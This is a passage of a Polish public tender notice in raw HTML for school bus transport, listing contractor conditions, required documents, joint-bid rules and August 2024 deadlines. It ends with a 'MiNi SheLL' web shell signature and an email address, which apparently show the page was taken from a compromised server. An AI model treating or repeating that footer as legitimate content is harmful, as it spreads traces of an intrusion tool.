finansowej<br/>Posiada określoną zdolność kredytową lub środki finansowe w kwocie 100 000,00 zł (słownie: sto tysięcy złotych)<br/><br/>4)	zdolności technicznej lub zawodowej<br/>1.	Warunek w powyższym zakresie zostanie uznany za spełniony, jeżeli Wykonawca ubiegający się o udzielenie przedmiotowego zamówienia wykaże, że w okresie ostatnich 3 lat przed upływem terminu składania ofert, a jeśli okres prowadzenia działalności jest krótszy - w tym okresie wykonał, a w przypadku świadczeń okresowych lub ciągłych wykonuje w sposób należyty co najmniej 2 usługi polegające na dowozie uczniów do szkół, każda o wartości minimum 100 000,00 zł brutto za cały rok szkolny. Dowodami, że usługi zostały wykonane lub są wykonywane należycie mogą być: referencje, bądź inne dokumenty wystawione przez podmiot na rzecz, którego usługi były wykonywane, a w przypadku świadczeń okresowych lub ciągłych są wykonywane. W przypadku świadczeń okresowych lub ciągłych nadal wykonywanych referencje bądź inne dokumenty potwierdzające ich należyte wykonanie powinny być wydane nie wcześniej niż 3 miesiące przed upływem terminu składania ofert.<br/>2.	Warunek w powyższym zakresie zostanie spełniony, jeżeli Wykonawca ubiegający się o udzielenie przedmiotowego zamówienia wykaże, że dysponuje co najmniej 5 osobami, zdolnymi do wykonania przedmiotu zmówienia, tj. posiadającymi kwalifikacje zawodowe i prawo jazdy kategorii D oraz doświadczenie w pracy na stanowisku kierowcy autobusu/busa co najmniej 3 lata. Kierowcy powinni być zatrudnieni na podstawie umowy o pracę w pełnym wymiarze czasu pracy, z wynagrodzeniem odpowiadającym warunkom rynkowym. <br/>W wykazie osób stanowiącym załącznik nr 8 do SWZ należy podać imię i nazwisko kierowcy, datę uzyskania prawa jazdy kategorii D, doświadczenie zawodowe oraz podstawę zatrudnienia. <br/>3.	Zamawiający uzna warunek za spełniony, jeżeli Wykonawca wykaże, że dysponuje 5 pojazdami (plus 1 rezerwowym) posiadającymi minimum:<br/>- 1 pojazd minimum 50 miejsc<br/>- 1 pojazd minimum 30 miejsc<br/>- 3 pojazdy minimum 20 miejsc<br/>- 1 pojazd rezerwowy<br/>W wykazie narzędzi, wyposażenia zakładu i urządzeń technicznych dostępnych wykonawcy usługi w celu realizacji zamówienia stanowiącym załącznik nr 9 do SWZ należy podać markę samochodu, typ, nr rejestracyjny, rok produkcji oraz ilość miejsc siedzących. <h3 class="mb-0">5.5.) Zamawiający wymaga złożenia oświadczenia, o którym mowa w art.125 ust. 1 ustawy: <span class="normal">Tak</span></h3> <h3 class="mb-0"> 5.6.) Wykaz podmiotowych środków dowodowych na potwierdzenie niepodlegania wykluczeniu: <span class="normal">2)<br/>ważną licencję lub obowiązujące zezwolenie na wykonywanie krajowego transportu drogowego osób zgodnie z art. 7 ustawy z dnia<br/>6 września 2001 roku o transporcie drogowym (t.j. Dz. U. z 2019 r., poz. 2140, z późn. zm.). Przy ocenie spełnienia tego warunku<br/>udziału przez Wykonawców wspólnie ubiegających się o udzielenie zamówienia, posiadanie uprawnień, o których mowa powyżej,<br/>jest wymagane od każdego z Wykonawców wspólnie ubiegających się o udzielenie zamówienia w takim zakresie, w jakim będą oni<br/>wykonywać usługę.<br/>3) Informację banku lub spółdzielczej kasy oszczędnościowo-kredytowej potwierdzającej wysokość posiadanych środków<br/>finansowych lub zdolność kredytową Wykonawcy, w okresie nie wcześniejszym niż 3 miesiące przed jej złożeniem – na okoliczność<br/>potwierdzenia spełnienia warunku udziału w postępowaniu określonego rozdział 6 pkt. 2.3 SWZ.<br/>4) Wykaz usług wykonanych lub wykonywanych okresie ostatnich 3 lat przed upływem terminu składania ofert, a jeśli okres<br/>prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich wartości, przedmiotu, dat wykonania i podmiotów, na<br/>rzecz których usługi zostały wykonane lub są wykonywane, oraz załączeniem dowodów określających, czy te usługi zostały<br/>wykonane lub są wykonywane należycie, przy czym dowodami, o których mowa są referencje bądź inne dokumenty sporządzone<br/>przez podmiot, na rzecz którego usługi zostały wykonane, a w przypadku świadczeń powtarzających się lub ciągłych są<br/>wykonywane, referencje bądź inne dokumenty potwierdzające ich należyte wykonanie powinny być wydane nie wcześniej niż 3<br/>miesiące przed upływem terminu składania ofert. Wykaz powinien potwierdzać spełnienie warunku określonego w rozdziale 6 pkt.<br/>2.4. ppkt 1<br/>5) Wykaz narzędzi, wyposażenia zakładu lub narzędzi technicznych dostępnych wykonawcy w celu wykonania zamówienia wraz z<br/>informacją o podstawie do dysponowania tymi zasobami. Wykaz powinien potwierdzać spełnienie warunku określonego w rozdziale<br/>6 pkt. 2.4. ppkt. 3<br/>6) Wykazu osób skierowanych przez wykonawcę do realizacji zamówienia, tj. kierowców pojazdów wraz z informacjami na temat ich<br/>kwalifikacji zawodowych, doświadczenia. Wykaz powinien potwierdzać spełnienie warunku określonego w rozdziale 6 pkt. 2.4 ppkt. 2</span> </h3> <h3 class="mb-0"> 5.7.) Wykaz podmiotowych środków dowodowych na potwierdzenie spełniania warunków udziału w postępowaniu: <span class="normal">1) oświadczenie wykonawcy,<br/>w zakresie art. 108 ust. 1 pkt 5 ustawy, o braku przynależności do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego<br/>2007 r. o ochronie konkurencji i konsumentów (Dz. U. z 2021 r. poz. 275 ze zm.), z innym wykonawcą, który złożył odrębną ofertę,<br/>ofertę częściową lub wniosek o dopuszczenie do udziału w postępowaniu, albo oświadczenia o przynależności do tej samej grupy<br/>kapitałowej wraz z dokumentami lub informacjami potwierdzającymi przygotowanie oferty, oferty częściowej lub wniosku o<br/>dopuszczenie do udziału w postępowaniu niezależnie od innego wykonawcy należącego do tej samej grupy kapitałowej (wzór<br/>załącznik Nr 6 do SWZ),</span> </h3> <h2 class="bg-light p-3 mt-4">SEKCJA VI - WARUNKI ZAMÓWIENIA</h2> <h3 class="mb-0">6.1.) Zamawiający wymaga albo dopuszcza oferty wariantowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.3.) Zamawiający przewiduje aukcję elektroniczną: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.4.) Zamawiający wymaga wadium: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.5.) Zamawiający wymaga zabezpieczenia należytego wykonania umowy: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.6.) Wymagania dotyczące składania oferty przez wykonawców wspólnie ubiegających się o udzielenie zamówienia: </h3> 10.1. Wykonawcy mogą wspólnie ubiegać się o udzielenie zamówienia. W takim przypadku, wykonawcy ustanawiają<br/>pełnomocnika do reprezentowania ich w postępowaniu o udzielenie zamówienia albo do reprezentowania w postępowaniu i<br/>zawarcia umowy w sprawie zamówienia publicznego.<br/>10.2. W przypadku Wykonawców wspólnie ubiegających się o udzielenie zamówienia:<br/>a/ żaden z tych Wykonawców nie może podlegać wykluczeniu z postępowanie<br/>b/ w odniesieniu do warunków udziału w postępowaniu wskazanych w SWZ, wykonawcy wspólnie ubiegający się o<br/>udzielenie zamówienia mogą polegać na zdolnościach tych z wykonawców, którzy wykonają roboty budowlane lub usługi,<br/>do realizacji których te zdolności są wymagane;<br/>c/ w przypadku, o którym mowa w pkt. b, wykonawcy wspólnie ubiegający się o udzielenie zamówienia dołączają do oferty<br/>oświadczenie, z którego wynika, które roboty budowlane, dostawy lub usługi wykonają poszczególni wykonawcy, wg wzoru<br/>stanowiącego zał. nr 5 do SWZ;<br/>d/ wykonawcy są zobowiązani ustanowić pełnomocnika do reprezentowania ich<br/>w postępowaniu o udzielenie zamówienia albo reprezentowania w postępowaniu<br/>i zawarcia umowy w sprawie zamówienia publicznego. Pełnomocnictwo powinno być złożone wraz z ofertą.<br/>10.3. W przypadku Wykonawców wspólnie ubiegających się o udzielenie zamówienia oświadczenia o których mowa w pkt.<br/>8.1 SWZ składa z ofertą każdy z Wykonawców wspólnie ubiegających się o zamówienie.<br/>10.5. W przypadku wspólnego ubiegania się o udzielenie zamówienia wykonawcy ustanawiają pełnomocnika do<br/>reprezentowania ich w postępowaniu o udzielenie zamówienia albo reprezentowania w postępowaniu i zawarcie umowy w<br/>sprawie zamówienia publicznego. Wszelka korespondencja kierowana będzie wyłącznie do podmiotu występującego jako<br/>pełnomocnik. Dokument potwierdzający ustanowienie pełnomocnictwa powinien zawierać wskazanie postępowania o<br/>zamówienie publiczne, którego dotyczy, wykonawców ubiegających się wspólnie o udzielenie zamówienia, ustanowionego<br/>pełnomocnika oraz zakres jego umocowania. Podpisy muszą zostać złożone przez osoby uprawnione do składania<br/>oświadczeń woli wymienione we właściwym rejestrze lub wpisie do ewidencji działalności gospodarczej.<br/>10.6. Jeżeli została wybrana oferta wykonawców wspólnie ubiegających się o udzielenie zamówienia, zamawiający może<br/>żądać przed zawarciem umowy w sprawie zamówienia publicznego kopii umowy regulującej współpracę tych wykonawców. <h3 class="mb-0">6.7.) Zamawiający przewiduje unieważnienie postępowania, jeśli środki publiczne, które zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia nie zostały przyznane: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VII - PROJEKTOWANE POSTANOWIENIA UMOWY</h2> <h3 class="mb-0">7.1.) Zamawiający przewiduje udzielenia zaliczek: <span class="normal">Nie</span></h3> <h3 class="mb-0">7.3.) Zamawiający przewiduje zmiany umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.4.) Rodzaj i zakres zmian umowy oraz warunki ich wprowadzenia: </h3> Zamawiający przewiduje możliwości wprowadzenia zmian do zawartej umowy, na podstawie art. 454-455 ustawy oraz<br/>postanowień Projektu Umowy. <h3 class="mb-0">7.5.) Zamawiający uwzględnił aspekty społeczne, środowiskowe, innowacyjne lub etykiety związane z realizacją zamówienia: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.6.) Zamawiający przewiduje następujące wymagania związane z realizacją zamówienia: </h3> <p class="mb-0">w zakresie zatrudnienia na podstawie stosunku pracy, w okolicznościach, o których mowa w art. 95 ustawy</p> <h2 class="bg-light p-3 mt-4">SEKCJA VIII – PROCEDURA</h2> <h3 class="mb-0">8.1.) Termin składania ofert: <span class="normal">2024-08-19 11:00</span></h3> <h3 class="mb-0">8.2.) Miejsce składania ofert: <span class="normal">Wykonawca składa ofertę za pomocą Platformy e-Zamówienia dostępnej pod adresem: https://ezamowienia.gov.pl</span></h3> <h3 class="mb-0">8.3.) Termin otwarcia ofert: <span class="normal">2024-08-19 11:20</span></h3> <h3 class="mb-0">8.4.) Termin związania ofertą: <span class="normal">do 2024-09-17</span></h3>

Creat By MiNi SheLL
Email: jattceo@gmail.com